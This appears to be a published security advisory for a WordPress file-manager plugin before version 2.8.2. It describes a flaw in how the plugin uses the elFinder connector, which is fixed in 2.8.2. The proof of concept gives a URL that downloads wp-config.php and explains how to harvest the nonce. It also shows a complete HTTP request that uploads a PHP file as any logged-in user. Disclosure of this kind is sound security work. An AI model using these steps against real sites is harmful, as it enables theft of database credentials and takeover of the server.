Secure File Manager < 2.8.2 - Authenticated Remote Code Execution
Description
The Secure File Manager uses the elFinder libraries in an insecure way, allowing authenticated users to execute arbitrary file management commands. v2.6 attempted to fix the issue by adding a CSRF nonce, however the nonce is displayed for all users in the Dashboard via the Secure File Manager menu (even though it will display an Unauthorized Access error for non admin users)
Proof of Concept
Download the wp-config.php < 2.6 - As an unauthenticated user, open /wp-content/plugins/secure-file-manager/vendor/elfinder/php/connector.minimal.php?cmd=file&target=l1_d3AtY29uZmlnLnBocA&download=1&cpath=/wp-admin/admin.php < 2.8.2 - Log in as any user, access the Secure File Manager menu (wp-admin/admin.php?page=sfm_file_manager) which will result in an Unauthorized Access error unless logged in as admin, view the source of the page and retrieve the value of the sfmpNonceKey. Then append it to the URL above in a _wnonce parameter: /wp-content/plugins/secure-file-manager/vendor/elfinder/php/connector.minimal.php?cmd=file&target=l1_d3AtY29uZmlnLnBocA&download=1&_wpnonce=69f62e1414&cpath=/wp-admin/admin.php RCE can be obtained as well, with a crafted request to upload a PHP file, e.g /hello-user.php for < 2.8.2, get the nonce with the same technique as above for < 2.6, just remove the _wpnonce parameter POST /wp-content/plugins/secure-file-manager/vendor/elfinder/php/connector.minimal.php HTTP/1.1 Host: 127.0.0.1 User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:84.0) Gecko/20100101 Firefox/84.0 Accept: */* Accept-Language: en-GB,en;q=0.5 Accept-Encoding: gzip, deflate Referer: http://127.0.0.1/wp-admin/admin.php?page=sfm_file_manager Content-Type: multipart/form-data; boundary=---------------------------32138351926630035821198693946 Content-Length: 851 Origin: http://127.0.0.1 Connection: close Cookie: [Subscriber cookie] -----------------------------32138351926630035821198693946 Content-Disposition: form-data; name="reqid" 1770034af3e3c9 -----------------------------32138351926630035821198693946 Content-Disposition: form-data; name="cmd" upload -----------------------------32138351926630035821198693946 Content-Disposition: form-data; name="target" l1_Lw -----------------------------32138351926630035821198693946 Content-Disposition: form-data; name="_wpnonce" 69f62e1414 -----------------------------32138351926630035821198693946 Content-Disposition: form-data; name="upload[]"; filename="hello-user.php" Content-Type: text/plain <?php echo 'failed'; ?> -----------------------------32138351926630035821198693946 Content-Disposition: form-data; name="mtime[]" 1375102826 -----------------------------32138351926630035821198693946--
Affects Plugins
Fixed in version 2.8.2✓
Classification
Miscellaneous
Timeline
Publicly Published
2020-11-23 (about 11 months ago)
Added
2020-11-23 (about 11 months ago)
Last Updated
2021-06-08 (about 4 months ago)